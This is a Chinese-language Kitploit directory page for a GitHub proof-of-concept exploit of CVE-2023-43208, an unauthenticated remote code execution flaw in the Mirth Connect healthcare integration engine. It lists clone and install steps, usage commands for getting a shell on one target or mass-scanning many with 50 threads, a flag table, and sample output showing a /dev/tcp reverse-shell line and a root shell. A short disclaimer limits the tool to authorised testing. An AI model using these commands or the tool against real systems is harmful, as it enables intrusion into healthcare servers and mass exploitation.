Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
工具/GitHubGitHub/4nuxd/cve-2023-43208
漏洞扫描器Payload生成漏洞利用Web应用程序漏洞利用渗透测试远程访问工具
GitHub4nuxd/cve-2023-43208

CVE-2023-43208

通过 XML 反序列化对 Mirth Connect 中的 CVE-2023-43208 进行未认证 RCE 利用,具有版本检测、批量扫描和交互式 PTY shell。

查看仓库
126个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-43208 — Mirth Connect 远程代码执行(RCE)

Python CVE Platform

针对 CVE-2023-43208 的概念验证利用程序,该漏洞是 Mirth Connect 版本低于 4.4.1 中的一个未经认证的远程代码执行漏洞。


描述

Mirth Connect 是一个广泛部署的开源医疗集成引擎。该漏洞利用 /api/users 端点的 Java 反序列化缺陷,通过精心构造的 XML 负载链式调用 Apache Commons Collections gadget 实现未经认证的远程代码执行。

增强版本将原始的 pwncat 监听器替换为完全无依赖的交互式 PTY Shell,仅使用 Python 内置模块(socket、select、tty、termios)。连接后会自动升级为完整的 PTY Shell。


受影响版本

软件受影响版本修复版本
Mirth Connect< 4.4.14.4.1+

功能特性

  • 自动检测 Mirth Connect 实例
  • 版本指纹识别与漏洞检查
  • 通过 XML 反序列化负载实现未经认证的 RCE
  • 自动 PTY Shell 升级(回退到 python3/python/script)
  • 正确传播终端尺寸(stty rows/cols)
  • 支持多线程的批量扫描
  • 将易受攻击的目标输出到文件
  • 无 pwncat 依赖——监听器仅使用标准库

安装

root@kitploit:~
git clone https://github.com/yourrepo/CVE-2023-43208
cd CVE-2023-43208
pip install -r requirements.txt

依赖

root@kitploit:~
requests
packaging
rich
alive-progress

使用方法

单个目标 — 获取 Shell

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <PORT>

单个目标 — 使用 ngrok / 绑定端口

root@kitploit:~
python3 CVE-2023-43208.py -u https://<TARGET> -lh <YOUR_IP> -lp <NGROK_PORT> -bp <LOCAL_PORT>

从文件批量扫描

root@kitploit:~
python3 CVE-2023-43208.py -f targets.txt -t 50 -o vulnerable.txt

参数


示例输出

root@kitploit:~
[*] Setting up listener on 10.10.15.202:4444 and launching exploit...
[*] Waiting for incoming connection on port 4444...
[*] Looking for Mirth Connect instance...
[+] Found Mirth Connect instance
[+] Vulnerable Mirth Connect version 4.4.0 instance found at https://10.129.5.3
[!] sh -c $@|sh . echo bash -c '0<&53-;exec 53<>/dev/tcp/...'
[*] Launching exploit against https://10.129.5.3...
[+] Received connection from 10.129.5.3:59640
[+] Shell opened! Upgrading to PTY...

root@mirth:/# 

免责声明

本工具仅用于授权的渗透测试和教育目的。
未经授权对你不拥有或未获得明确许可的系统进行使用是非法的。
作者不对因使用本工具造成的任何滥用或损害负责。


致谢

  • 编写者: K3ysTr0K3R 和 Chocapikk
  • 增强者: 4nuxd
下载工具
标志描述
-u, --url目标 URL
-lh, --lhost你的监听 IP
-lp, --lport你的监听端口
-bp, --bindport绑定端口覆盖(与 ngrok 一起使用时有用)
-f, --file包含目标 URL 列表的文件
-o, --output将易受攻击的目标保存到文件
-t, --threads扫描线程数(默认:50)